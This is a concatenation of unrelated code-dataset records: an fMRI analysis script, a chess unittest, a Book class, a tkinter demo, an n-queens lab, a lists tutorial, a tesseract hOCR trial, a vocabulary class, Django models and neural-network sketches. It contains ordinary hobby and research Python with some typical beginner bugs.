[np.mean(y)], c='green', label='Average value')\n plt.scatter(x, y-x, c='black', label='increase in r2')\n plt.scatter([np.percentile(x, 50)], [np.percentile(y, 50)], c='blue', label='Median value')\n plt.title('\\n'.join(wrap('{} in {}'.format(analysis['title'], labels[index_mask+1]))))\n plt.xlabel('\\n'.join(wrap('{}'.format(analysis['x_label']))))\n plt.ylabel('\\n'.join(wrap('{}'.format(analysis['y_label']))))\n #plt.xlim(0,0.2)\n #plt.ylim(0,0.2)\n plt.plot([max([np.min(x), np.min(y)]), min([np.max(x), np.max(y)])], [max([np.min(x), np.min(y)]), min([np.max(x), np.max(y)])], c='blue')\n plt.axhline(y=0., color='blue', linestyle='-')\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'scatter_plots', analysis_name)\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis['title'] + ' - ' + labels[index_mask+1] + ' - ' + subject + '.png'))\n plt.close()\n i+=1\n \n\n ##########################################################################\n ############################## Check models ##############################\n ##########################################################################\n \n if 'check_model' in args.analysis[0]:\n # retrieve default atlas (= set of ROI)\n atlas = datasets.fetch_atlas_harvard_oxford(params.atlas)\n labels = atlas['labels']\n maps = nilearn.image.load_img(atlas['maps'])\n\n # extract data\n for index_mask in range(len(labels)-1):\n mask = math_img('img > 50', img=index_img(maps, index_mask)) \n masker = NiftiMasker(mask_img=mask, memory='nilearn_cache', verbose=5)\n masker.fit()\n for analysis in analysis_parameters['check_model']:\n for subject in subjects:\n subject = Subjects().get_subject(int(subject))\n model = [os.path.join(paths.path2derivatives, source, 'ridge-indiv', language, analysis['model'], 'ridge-indiv_{}_'.format(language) + analysis['model'] + '_' + analysis['name'] + '_' + subject + '.nii.gz')]\n analysis_name = analysis['name']\n x = masker.transform(model).reshape(-1) # you should include confounds\n\n # save plots\n plt.figure(i)\n plt.hist(x, color = 'blue', edgecolor = 'black', bins = 100)\n\n plt.title('\\n'.join(wrap('{} in {}'.format(analysis['title'], labels[index_mask+1]))))\n plt.xlabel('\\n'.join(wrap('R2 of {}'.format(analysis['model_name']))))\n plt.ylabel('\\n'.join(wrap('Density')))\n plt.xlim(0,0.2)\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'check_model')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + labels[index_mask+1] + ' - ' + subject + '.png'))\n plt.close()\n i+=1\n \n\n\n\n\n ###########################################################################\n ################## Model complexity impact on regression ##################\n ###########################################################################\n # x: complexity variable\n # y_list: list of list of values for each subject [sub1_list, sub2_list, ...]\n # sub1_list: list of values (perplexity, r2 distribution, ...) for a given subject\n if 'model_complexity' in args.analysis[0]:\n mask = mean_img(load_img(args.default_mask))\n mask = math_img('img > 50', img=mask)\n masker = NiftiMasker(mask_img=mask, memory='nilearn_cache', verbose=5)\n masker.fit()\n \n for analysis in analysis_parameters['model_complexity']:\n analysis_name = analysis['name']\n x = analysis['complexity_variable']\n if analysis['variable_of_interest'] not in ['r2_test', 'significative_r2_100']:\n y_list = list(zip(*analysis['value_v-o-i'])) # list of list of subject values [sub1_list, sub2_list, ...]\n y = np.mean(analysis['value_v-o-i'], axis=1)\n plt.figure(i)\n plt.plot(x, y)\n plt.title('\\n'.join(wrap(analysis['title'])))\n plt.xlabel('\\n'.join(wrap(analysis['variable_name'])))\n plt.ylabel('\\n'.join(wrap(analysis['variable_of_interest'])))\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'model_complexity')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + analysis['variable_of_interest'] + ' = f(' + analysis['variable_name'] + ') - ' + subject + '.png'))\n plt.close()\n i+=1\n else:\n y_list = []\n for subject in subjects:\n significant_values = [np.load(mask).sum() for mask in analysis['mask']]\n max_values = []\n y_sub = []\n subject = Subjects().get_subject(int(subject))\n for var in analysis['complexity_variable']:\n # extract data\n model_name = '_'.join([analysis['model_category'].lower(), \n 'wikikristina', \n 'embedding-size', str(var if analysis['variable_name']=='ninp' else analysis['parameters']['ninp']),\n 'nhid', str(var if analysis['variable_name']=='nhid' else analysis['parameters']['nhid']),\n 'nlayers', str(var if analysis['variable_name']=='nlayers' else analysis['parameters']['nlayers']),\n 'dropout', str(var if analysis['variable_name']=='dropout' else analysis['parameters']['dropout']).replace('.', ''),\n analysis['parameters']['which']])\n path = os.path.join(paths.path2derivatives, source, 'ridge-indiv', language, model_name)\n file_name = '_'.join(['ridge-indiv', \n language, analysis['model_category'].lower(),\n 'wikikristina', \n 'embedding-size', str(var if analysis['variable_name']=='ninp' else analysis['parameters']['ninp']), \n 'nhid', str(var if analysis['variable_name']=='nhid' else analysis['parameters']['nhid']),\n 'nlayers', str(var if analysis['variable_name']=='nlayers' else analysis['parameters']['nlayers']),\n 'dropout', str(var if analysis['variable_name']=='dropout' else analysis['parameters']['dropout']).replace('.', ''),\n analysis['parameters']['which'],\n analysis['variable_of_interest'],\n str('pca_' + str(var) if analysis['variable_name']=='pca' else analysis['parameters']['pca']),\n analysis['parameters']['voxel_wise'],\n subject + '.nii.gz'])\n path2file = os.path.join(path, file_name)\n y_sub.append(masker.transform(path2file)[0])\n max_values.append(np.max(y_sub[-1]))\n plt.figure(i)\n plt.boxplot(y_sub, positions=x, sym='', widths=5, meanline=True, showmeans=True)\n plt.title('\\n'.join(wrap(analysis['title'] + ' - ' + subject)))\n plt.xlabel('\\n'.join(wrap(analysis['variable_name'])))\n plt.ylabel('\\n'.join(wrap(analysis['variable_of_interest'])))\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'model_complexity')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + analysis['variable_of_interest'] + ' = f(' + analysis['variable_name'] + ') - ' + subject + '.png'))\n plt.close()\n i += 1\n\n fig, ax1 = plt.subplots()\n plt.title('\\n'.join(wrap('Count R2>0 + R2 max' ' - ' + subject)))\n\n color = 'tab:red'\n ax1.set_xlabel('\\n'.join(wrap(analysis['variable_name'])))\n ax1.set_ylabel('\\n'.join(wrap('count')), color=color)\n ax1.plot(x, significant_values, color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n\n color = 'tab:blue'\n ax2.set_ylabel('\\n'.join(wrap('R2 max')), color=color) # we already handled the x-label with ax1\n ax2.plot(x, max_values, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n\n fig.tight_layout()\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'model_complexity')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + analysis['variable_of_interest'] + ' non zero values count' + ' - ' + subject + '.png'))\n plt.close()\n\n i += 1\n y_list.append(y_sub) # you should include confounds\n\n\n\n # save plots\n plt.figure(i)\n plt.boxplot(np.ndarray.tolist(np.mean(np.array(y_list), axis=0)), positions=x)\n plt.title('\\n'.join(wrap(analysis['title'] + ' - ' + subject)))\n plt.xlabel('\\n'.join(wrap(analysis['variable_name'])))\n plt.ylabel('\\n'.join(wrap(analysis['variable_of_interest'])))\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'model_complexity')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + analysis['variable_of_interest'] + ' = f(' + analysis['variable_name'] + ') - ' + 'averaged_accross_subjects' + '.png'))\n plt.close()\n plt.close()\n i += 1\n\n ###########################################################################\n ############################ Specific analysis ############################\n ###########################################################################\n if 'specific_analysis' in args.analysis[0]:\n window_size_beg = 0\n window_size_end = 20\n color_map = {'entropy': 'tab:red',\n 'surprisal': 'tab:blue'}\n analysis_name = 'Entropy - Surprisal'\n for subject in subjects:\n subject = Subjects().get_subject(int(subject))\n for model in analysis_parameters['specific_analysis']:\n for run in range(1, params.nb_runs + 1):\n path = os.path.join(paths.path2data, model['data'].format(run))\n iterator = tokenize(path, language)\n x = np.arange(len(iterator))[window_size_beg:window_size_end]\n\n def get_path(name, model):\n model_name = '_'.join([model['parameters']['model_category'].lower(), \n 'wikikristina', \n 'embedding-size', str(model['parameters']['ninp']),\n 'nhid', str(model['parameters']['nhid']),\n 'nlayers', str(model['parameters']['nlayers']),\n 'dropout', str(model['parameters']['dropout']).replace('.', ''),\n model['parameters']['other'].format(name)])\n path = os.path.join(paths.path2derivatives, source, 'raw-features', language, model_name)\n file_name = '_'.join(['raw-features', \n language, model['parameters']['model_category'].lower(),\n 'wikikristina', \n 'embedding-size', str(model['parameters']['ninp']),\n 'nhid', str(model['parameters']['nhid']),\n 'nlayers', str(model['parameters']['nlayers']),\n 'dropout', str(model['parameters']['dropout']).replace('.', ''),\n model['parameters']['other'].format(name),\n 'run{}.csv'.format(run)])\n return os.path.join(path, file_name)\n\n y_ent = pd.read_csv(get_path('entropy', model))['entropy'][window_size_beg:window_size_end]\n y_sur = pd.read_csv(get_path('surprisal', model))['surprisal'][window_size_beg:window_size_end]\n \n fig, ax1 = plt.subplots()\n plt.xticks(x, iterator[window_size_beg:window_size_end], rotation=90)\n plt.title('\\n'.join(wrap('Entropy & Surprisal' + ' - ' + subject)))\n color = color_map['entropy']\n ax1.set_xlabel('\\n'.join(wrap('Le Petit Prince text')))\n ax1.set_ylabel('\\n'.join(wrap('Entropy')), color=color)\n ax1.plot(x, y_ent, color=color)\n plt.legend()\n ax1.tick_params(axis='y', labelcolor=color)\n\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n color = color_map['surprisal']\n ax2.set_ylabel('\\n'.join(wrap('Surprisal')), color=color) # we already handled the x-label with ax1\n ax2.plot(x, -y_sur, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n fig.tight_layout()\n plt.legend()\n ax = plt.gca()\n ax.grid(True, which='both')\n # plt.grid(which='both')\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'specific_analysis')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + 'window_size_' + str(window_size_end-window_size_beg) + ' - ' + subject + 'run{}.png'.format(run)))\n plt.close()\n i += 1\n\n","sub_path":"fMRI/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":19486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29481711","text":"import unittest\nimport sys\nsys.path.insert(0, \"../../src/Model/\")\nfrom PieceColor import PieceColor\nfrom Pon import Pon\nfrom Knight import Knight\nfrom Bishop import Bishop\nfrom Rook import Rook\nfrom Queen import Queen\nfrom King import King\nfrom Board import Board\nfrom EatMove import EatMove\n\nclass TestEatMove(unittest.TestCase):\n def setUp(self):\n self.color = PieceColor.LIGHT\n self.otherColor = PieceColor.DARK\n self.board = Board( 8, 8 )\n\n def test_EatMove_Pon(self):\n pon = Pon( self.color )\n self.board.addPiece( ( 2, 2 ), pon )\n self.board.addPiece( ( 3, 3 ), Knight( self.otherColor ) )\n self.board.move( EatMove( self.board, ( 2, 2 ), ( 3, 3 ) ) )\n self.assertEqual( self.board.getPiece( ( 3, 3 ) ), pon )\n self.assertEqual( self.board.getPiece( ( 2, 2 ) ), None )\n\n def test_EatMove_Pon_undo(self):\n pon = Pon( self.color )\n self.board.addPiece( ( 2, 2 ), pon )\n target = Knight( self.otherColor )\n self.board.addPiece( ( 3, 3 ), target )\n self.assertFalse( pon.getHasMoved() )\n move = EatMove( self.board, ( 2, 2 ), ( 3, 3 ) )\n self.board.move( move )\n self.assertTrue( pon.getHasMoved() )\n self.assertEqual( self.board.getPiece( ( 3, 3 ) ), pon )\n self.assertEqual( self.board.getPiece( ( 2, 2 ) ), None )\n self.board.undo( move )\n self.assertEqual( self.board.getPiece( ( 2, 2 ) ), pon )\n self.assertEqual( self.board.getPiece( ( 3, 3 ) ), target )\n self.assertFalse( pon.getHasMoved() )\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/Model/TestEatMove.py","file_name":"TestEatMove.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"604243592","text":"\"\"\"Implements the Book class containing the title, author, and page count.\"\"\"\n# Create your Book class in this file\n\n\nclass Book:\n \"\"\"Implements the Book class.\"\"\"\n\n def __init__(self, title='', author='', pages=0, is_completed=False):\n self.title = title\n self.author = author\n self.number_of_pages = int(pages)\n if isinstance(is_completed, bool):\n self.is_completed = is_completed\n elif is_completed in {'r', 'c'}:\n self.is_completed = True if is_completed == 'c' else False\n else:\n raise ValueError\n\n def __str__(self):\n return '{0} by {1}, {2} pages {3}'.format(\n self.title or '\"Empty Book\"',\n self.author or 'Unknown author',\n self.number_of_pages,\n '(completed)' if self.is_completed else '',\n )\n\n def str2csv(self):\n \"\"\"Prepare book data for csv file.\"\"\"\n return ','.join((\n self.title,\n self.author,\n str(self.number_of_pages),\n 'c' if self.is_completed else 'r'\n ))\n\n def mark_required(self):\n \"\"\"Mark the book as required.\"\"\"\n self.is_completed = False\n\n def mark_completed(self):\n \"\"\"Mark the book as completed.\"\"\"\n self.is_completed = True\n\n def is_long(self):\n \"\"\"Book length Test.\"\"\"\n return self.number_of_pages > 500\n","sub_path":"book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"353183812","text":"from tkinter import * \nwindow = Tk()\nnumber1 = False\nnumber2 = False\n\n\ndef number1Int():\n global number1\n if number1 == True:\n number1 = False\n else:\n number1 = True \n print(number1)\n\ndef number2Int():\n global number2\n if number2 == True:\n number2 = False\n else:\n number2 = True \n print(number2)\n\nbutton1 = Button(window, command = number1Int,text=\"1\")\nbutton1.pack()\nbutton2 = Button(window, command = number2Int,text=\"2\")\nbutton2.pack()\n\nwindow.mainloop()","sub_path":"tkTest/tkInterButtonGUI.py","file_name":"tkInterButtonGUI.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"210533750","text":"\"\"\"\r\nModule with the methods of lab4\r\n:author: Juan Ortiz\r\n\"\"\"\r\nimport time\r\ndef valid(board):\r\n \"\"\"\r\n Determines if a board is a valid n-queens solution\r\n :param board: board with the queens\r\n :return: returns True if the board is a n-queens solution\r\n \"\"\"\r\n for i in range(len(board)):\r\n for j in range(len(board)):\r\n if i == j:\r\n continue\r\n else:\r\n if (board[i] - board[j]) == (i - j):\r\n return False\r\n if (board[j] - board[i]) == (i - j):\r\n return False\r\n else:\r\n return True\r\n\r\ndef p_queens(board, n):\r\n \"\"\"\r\n Taken from https://stackoverflow.com/questions/2710713/algorithm-to-generate-all-possible-permutations-of-a-list\r\n Calculates all the possible permutations of an array without repeating\r\n :param board: array of which we want to know its permutations\r\n :param n: 0\r\n :return: all possible permutations\r\n \"\"\"\r\n\r\n if n + 1 >= len(board):\r\n yield board\r\n else:\r\n for p in p_queens(board, n + 1):\r\n yield p\r\n for i in range(n + 1, len(board)):\r\n board[n], board[i] = board[i], board[n]\r\n for p in p_queens(board, n + 1):\r\n yield p\r\n board[n], board[i] = board[i], board[n]\r\n\r\n\r\ndef n_queens(n):\r\n \"\"\"\r\n Gives the number of solutions for the queens problem using brute force\r\n :param n: number of queens or size of the board\r\n :return: returns an integer that represents the number of solutions for the given n queens\r\n \"\"\"\r\n if n == 0:\r\n return 0\r\n board = list(range(n))\r\n count = 0\r\n for p in p_queens(board, 0):\r\n if valid(p):\r\n count += 1\r\n return count\r\n\r\n\"\"\"\r\nif __name__ == '__main__':\r\n start = time.clock()\r\n n_queens(16)\r\n end = time.clock() - start\r\n print(\"n_queens took:\", end*1000, \"ms\")\r\n\"\"\"","sub_path":"laboratorios/lab02/codigo/Python/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"481314976","text":"# Lists\n\ncourses = ['Maths', 'Science', 'Social', 'Computer', 'Geography']\ncourses_new = ['Pysics', 'Chemistry']\nnums = [1, 6, 2, 7, 8, 3]\n\n# print(courses)\n# print(len(courses))\n\n\n# Indexing\n# print(courses[0])\n# print(courses[1])\n# print(courses[2])\n# print(courses[3])\n# print(courses[4])\n\n# Negative Index\n# print(courses[-1])\n\n# Range Index\n# print(courses[0:3])\n# print(courses[2:])\n\n# Append to List\n# courses.append('Arts')\n# courses.remove('Maths')\n# courses.insert(1, 'Arts')\n\n# Remove the last Item in the List. i.e Geography\npopped = courses.pop()\nprint(popped)\nprint(courses)\n# print(courses_new)\n\n# Merging two Lists\n# courses.extend(courses_new)\n# print(courses)\n\n\n# Sorting the Lists\n# courses.reverse()\n# print(courses)\n\n# courses.sort()\n# print(courses)\n\n# nums.sort()\n# print(nums)\n\n# nums.sort(reverse=True)\n# print(nums)\n\n\n# Sorted version of lists without altering actual Position\n# sorted_nums = sorted(nums)\n# print(sorted_nums)\n#\n# print(min(nums))\n# print(max(nums))\n# print(sum(nums))\n\n\n# Search Functions for Lists\n# print(courses.index('Geography'))\n# print('Maths' in courses)\n\n# for item in courses:\n# print(item)\n\n# for index, course in enumerate(courses):\n# print(index, course)\n\n# for index, course in enumerate(courses, start=2):\n# print(index, course)\n\n# Lists to Strings - Join Method\n# course_str = ' , '.join(courses)\n# print(course_str)\n\n# course_str = ' - '.join(courses)\n# print(course_str)\n\n# # Strings to Lists\n# new_list = course_str.split('-')\n# print(new_list)\n\n\n# Lists are Mutable , Tuples are Immutable\n# Mutable\n# list_1 = ['History', 'Math', 'Physics', 'CompSci']\n# list_2 = list_1\n\n# print(list_1)\n# print(list_2)\n\n# list_1[0] = 'Art'\n\n# print(list_1)\n# print(list_2)\n\n# Tuples - Immutable\n# tuple_1 = ('History', 'Math', 'Physics', 'CompSci')\n# tuple_2 = tuple_1\n#\n# print(tuple_1)\n# print(tuple_2)\n#\n# tuple_1[0] = 'Art'\n#\n# print(tuple_1)\n# print(tuple_2)\n\n# Sets - Doesn't show the duplicate Values\n\n# cs_courses = {'History', 'Math', 'Physics', 'CompSci'}\n# print(cs_courses)\n\ncs_courses = {'History', 'Math', 'Physics', 'CompSci'}\ncs_courses_1 = {'History', 'Math', 'Art', 'Design'}\n\nprint(cs_courses.intersection(cs_courses_1))\nprint(cs_courses.union(cs_courses_1))\n\n# Empty Lists\n# empty_list = []\n# empty_list = list()\n\n# Empty Tuples\n# empty_tuple = ()\n# empty_tuple = tuple()\n\n# Empty Sets\n# empty_set = {} # This isn't right! It's a dict\n# empty_set = set()\n","sub_path":"Learning-Corey/List_Tuples_Sets.py","file_name":"List_Tuples_Sets.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"360153175","text":"import logging\nfrom pkg_resources import resource_stream\n\nimport numpy as np\n\n\nlogger = logging.getLogger(__name__)\n\n\n# TODO 添加 test 文件\nclass Vocabulary(object):\n def __init__(self) -> None:\n self._char_vocab_stream_args = [\"cnlp\", \"src/char_vocab.txt\"]\n self._word_vocab_stream_args = [\"cnlp\", \"src/word_vocab.txt\"]\n self._padding_token = \"@PAD@\"\n self._unknown_token = \"@UNK@\"\n\n @staticmethod\n def _read_vocab_from_file(vocab_path: str) -> list:\n with open(vocab_path, \"r\", encoding=\"utf-8\") as vocab_file:\n vocab_list = [_v.strip(\"\\n\") for _v in vocab_file]\n return vocab_list\n\n @staticmethod\n def _read_vocab_from_stream(stream_args: list) -> list:\n stream = resource_stream(*stream_args)\n vocab_list = [_v.decode().strip(\"\\n\") for _v in stream.readlines()]\n stream.close()\n return vocab_list\n\n def _extend_vocab(self, vocab_data: list) -> list:\n vocab_data.append(self._padding_token)\n vocab_data.append(self._unknown_token)\n return vocab_data\n\n def get_default_vocab(self, vocab_type: str = \"char\") -> list:\n if vocab_type == \"char\":\n _vocab = self._read_vocab_from_stream(self._char_vocab_stream_args)\n elif vocab_type == \"word\":\n _vocab = self._read_vocab_from_stream(self._word_vocab_stream_args)\n else:\n raise ValueError(f\"error vocab type: {vocab_type}\")\n return _vocab\n\n def token_to_index(self,\n tokens: [list, str] = None,\n max_len: int = None,\n vocab_path: str = None,\n vocab_type: str = \"char\") -> list:\n if vocab_path:\n vocab_data = self._read_vocab_from_file(vocab_path)\n else:\n vocab_data = self.get_default_vocab(vocab_type)\n vocab_data = self._extend_vocab(vocab_data)\n\n if isinstance(tokens, str):\n token_list = [tokens]\n elif isinstance(tokens, list):\n token_list = tokens\n else:\n raise TypeError(f\"not support this type: {type(tokens)}\")\n\n if token_list:\n if not max_len:\n # 如果 max_len 没有默认值,自动取覆盖80%数据的长度\n logger.warning(\"max length is 0 or empty, automatically take over 80% of the length of the data.\")\n token_len_list = [len(_token) for _token in token_list]\n max_len = sorted(token_len_list)[int(len(token_list) * 0.8)]\n\n index_list = []\n for token_item in token_list:\n index_array = np.zeros(max_len, dtype=int) + vocab_data.index(self._padding_token)\n if len(token_item) >= max_len:\n for token_index, token in enumerate(token_item[:max_len]):\n if token in vocab_data:\n index_array[token_index] = vocab_data.index(token)\n else:\n index_array[token_index] = vocab_data.index(self._unknown_token)\n else:\n for token_index, token in enumerate(token_item):\n if token in vocab_data:\n index_array[token_index] = vocab_data.index(token)\n else:\n index_array[token_index] = vocab_data.index(self._unknown_token)\n\n index_list.append(index_array.tolist())\n\n if isinstance(tokens, str):\n return list(index_list[0])\n else:\n return index_list\n else:\n raise ValueError(\"token_list is None or empty !\")\n\n def index_to_token(self,\n indexs: list = None,\n vocab_path: str = None,\n vocab_type: str = \"char\") -> list:\n if vocab_path:\n vocab_data = self._read_vocab_from_file(vocab_path)\n else:\n vocab_data = self.get_default_vocab(vocab_type)\n vocab_data = self._extend_vocab(vocab_data)\n max_vocab_length = len(vocab_data)\n\n token_list = []\n if indexs:\n for index_item in indexs:\n if isinstance(index_item, int):\n if index_item < max_vocab_length:\n token_list.append(vocab_data[index_item])\n else:\n token_list.append(self._unknown_token)\n elif isinstance(index_item, list):\n token = []\n for _index in index_item:\n if isinstance(_index, int):\n if _index < max_vocab_length:\n token.append(vocab_data[_index])\n else:\n token.append(self._unknown_token)\n else:\n raise TypeError(f\"error type data: {index_item}\")\n token_list.append(token)\n else:\n raise TypeError(f\"error type data: {index_item}\")\n\n return token_list\n else:\n raise ValueError(\"indexs is None or empty !\")\n","sub_path":"cnlp/data/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"196146948","text":"\"\"\"\ntrial to run tesser in hOCR mode and parse output\n\nalternative to running tesser in pdf mode then using pdftohtml from poppler-utils to get xml\n\nwould I get different bounding box data with a different psm ??\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport subprocess\nimport time\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\n\n\n# todo\n# need to use opencv to scale the images\n# need to tokenise\n# experiment with some parsing\n\nexe_name = 'tesseract'\n\nimage1 = 'Im1.tiff'\nimage10 = '00018718_2011_Im10.tiff'\nimage11 = '00018718_2011_Im11.tiff'\nimage13 = '00018718_2011_Im13.tiff'\nimage15 = '00018718_2011_Im15.tiff'\n\nimages = [image1, image10, image11, image13, image15]\n\nstop_words = set(stopwords.words('english'))\nstemmer = PorterStemmer()\n\n\ndef process_call(*args):\n \"\"\"\n calls a subprocess, expects args for tesser in this app\n \"\"\"\n\n try:\n proc = subprocess.check_call(args)\n print('subprocess retcode {r}'.format(r=proc))\n except subprocess.CalledProcessError as exp:\n print('subprocess.CalledProcessError : ', exp)\n\n\ndef gen_args(images):\n \"\"\"\n create an args list\n \"\"\"\n\n oem = '-oem 2' # tesseract + cube\n psm = '-psm 1' # automatic psm with OSD -orientation and script detection => example shown\n mode = 'hocr'\n\n args = [[exe_name, img, (img[:-5]), psm, oem, mode] for img in images]\n\n print(args)\n return args\n\n\ndef ocr_files():\n\n hocr_args = gen_args(images)\n print(hocr_args)\n\n for arg in hocr_args:\n print(arg)\n process_call(*arg)\n\ndef ocr_simple():\n oem = '-oem 2' # tesseract + cube\n psm = '-psm 7' # automatic psm with OSD -orientation and script detection => example shown\n mode = 'hocr'\n\n arg = [exe_name, '00018718_2011_Im10.tiff', 'Im102', psm, oem, mode]\n print(arg)\n process_call(*arg)\n return\n\n\ndef parse_file(img):\n # read one of the hocr files and get the text\n with open(img, 'rt') as fn:\n hocr = fn.read()\n soup = BeautifulSoup(hocr, 'html.parser')\n words = soup.find_all('span', class_='ocrx_word')\n word_list = []\n\n for word in words:\n\n w = word.get_text().lower().replace('\\'', '')\n # print(w)\n word_list.append(w)\n if len(word_list) >= 20:\n break\n\n print(word_list)\n filtered_text = [word for word in word_list if word not in stop_words]\n print(filtered_text)\n stemmed_list = [stemmer.stem(word) for word in filtered_text]\n print(stemmed_list)\n\ndef parse_simple(img):\n # read one of the hocr files and get the text\n with open(img, 'rt') as fn:\n hocr = fn.read()\n soup = BeautifulSoup(hocr, 'html.parser')\n words = soup.find_all('span', class_='ocrx_word')\n word_list = []\n\n for word in words:\n w = word.get_text().lower().replace('\\'', '')\n bbox = word['title'].split(';')\n bbox = bbox[0].split(' ')\n bbox = tuple([int(x) for x in bbox[1:]])\n print(w, bbox)\n\n\nif __name__ == '__main__':\n\n # start_ocr = time.time()\n # ocr_files()\n # end_ocr = time.time()\n\n # start_parse = time.time()\n # for img in images:\n # new_fn = img[:-5] + '.hocr'\n # print('\\n\\nFile: {}\\n'.format(new_fn))\n # parse_file(new_fn)\n # end_parse = time.time()\n\n\n ocr_simple()\n parse_simple('Im102.hocr')\n\n\n # print('average ocr duration {} s'.format((end_ocr-start_ocr)/5))\n # print('average parse duration {} s'.format((end_parse - start_parse) / 5))\n\n","sub_path":"Trials/tesser/tesserHOCR/hOCR_trial.py","file_name":"hOCR_trial.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"404821678","text":"# codding=utf-8\nfrom django.db import models\n\nfrom applicationgrant.models import AppGrant\n\n\nclass AppGrantRiskRound(models.Model):\n\tclass Meta:\n\t\tverbose_name = u'Ризики проекту'\n\t\tdb_table = u'appgrant_risk_rough'\n\n\tapp_parent = models.OneToOneField(AppGrant, primary_key=True,\n\t on_delete=models.CASCADE)\n\n\tris_rough_copy = models.BooleanField(\n\t\tblank=True,\n\t\tdefault=False,\n\t\thelp_text=u'Чернетка'\n\t)\n\n\nclass AppGrantRisks(models.Model):\n\tclass Meta:\n\t\tverbose_name = u'Ризики'\n\t\tdb_table = u'appgrant_risks'\n\n\tRISK = ((0, u'Внутрішній'), (1, u'Зовнішній',))\n\tPROBABILITY = ((u'Низька', u'Низька'), (u'Середня', u'Середня'), (u'Висока', u'Висока'))\n\n\tapp_parent = models.ForeignKey(\n\t\tAppGrant,\n\t\ton_delete=models.CASCADE,\n\t\tblank=False,\n\t\tnull=True\n\t)\n\trisk_o_i = models.IntegerField(\n\t\tchoices=RISK,\n\t\tblank=False\n\t)\n\trisks = models.TextField(\n\t\tverbose_name=u'Зовнішні',\n\t\tmax_length=3000,\n\t\tnull=True,\n\t\tblank=False,\n\t)\n\tprobability = models.CharField(\n\t\tmax_length=50,\n\t\tchoices=PROBABILITY,\n\t\tblank=False\n\t)\n\tstrategy = models.TextField(\n\t\tverbose_name=u'Стратегія мінімалізації ризиків зовнішніх',\n\t\tmax_length=3000,\n\t\tnull=True,\n\t\tblank=False,\n\t)\n","sub_path":"applicationgrant/models/app_grant_risk.py","file_name":"app_grant_risk.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"160358916","text":"import sys, os\nsys.pathappend(os.pardir)\nimport numpy as np\n\nfrom common.layers import *\nfrom common.gradient import numerical_gradient\nfrom collections import OrderedDict\n\nclass TwoLayerNet:\n def __init__(self, input_size, hidden_size, otput_size, weight_init_std=0.01):\n self.params = {}\n self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)\n self.params['b1'] = np.zeros(hidden_size)\n self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)\n self.params['b2'] = np.zeros(output_size)\n\n self.layers = OrderedDict()\n self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])\n self.layers['Relu1'] = Relu()\n self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])\n\n self.lastLayer = SoftmaxWithLoss()\n\n def predict(self, x):\n for layer in self.layers.values():\n x = layer.forward(x)\n\n return x\n \n def loss(self, x, t):\n y = self.predict(x)\n return self.lastLayer.forward(y, t)\n\n def accuracy(self, x, t):\n y = self.predict(x)\n y = np.argmax(y, axis=1)\n if t.ndim != 1: t = np.argmax(t, axis=1)\n accuracy = np.sum(y == t) / float(x.shape[0])\n return accuracy\n \n","sub_path":"deep_learning/backpropagate.py","file_name":"backpropagate.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599031936","text":"from keras import layers\nfrom keras import models\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nimport os, shutil\nimport matplotlib.pyplot as plt\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport tensorflow as tf\n\n# 元のデータセットを展開したディレクトリへのパス\noriginal_dataset_dir = '/home/makoto/work/shake/DLwithPython/chapter5/dataset/train'\n\n# 